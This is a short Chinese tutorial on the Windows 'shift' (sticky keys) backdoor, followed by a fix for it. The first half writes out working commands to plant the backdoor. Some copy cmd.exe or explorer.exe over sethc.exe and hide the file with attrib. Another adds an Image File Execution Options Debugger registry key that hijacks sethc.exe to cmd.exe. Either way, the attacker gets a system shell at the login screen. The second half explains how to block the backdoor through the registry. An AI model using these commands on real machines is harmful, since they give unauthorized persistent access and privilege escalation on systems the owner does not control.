后门之shift后门制作及修复方法

时间:2024-03-28 12:04:49

一、如何制作shift后门

方法1

在cmd窗口,敲打命令如下:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。

(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)

方法2

将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去

找到  C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中

方法3

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

后门之shift后门制作及修复方法

命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd

修复方法

1,运行“regedit”打开注册表

2,切换该位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

如果该目录下不存在sethc.exe项:

后门之shift后门制作及修复方法

对着Image File Execution 右键 新建项 里面输入sethc.exe

后门之shift后门制作及修复方法

对着新创建的sethc.exe右健,新建,字符串值,Debugger

后门之shift后门制作及修复方法

双击新建的Debugger,在数值数据中填入afafagagag一些你胡乱打的数值

后门之shift后门制作及修复方法

置完后最好设置下权限,Everyone 禁止 删除 禁止 设置项值

如果目录下存在sethc.exe项:

打开sethc.exe项 右面双击 Debugger 里面的内容改成afagagagag之类的(乱打就行),这样就免疫并且清除了 shift后门.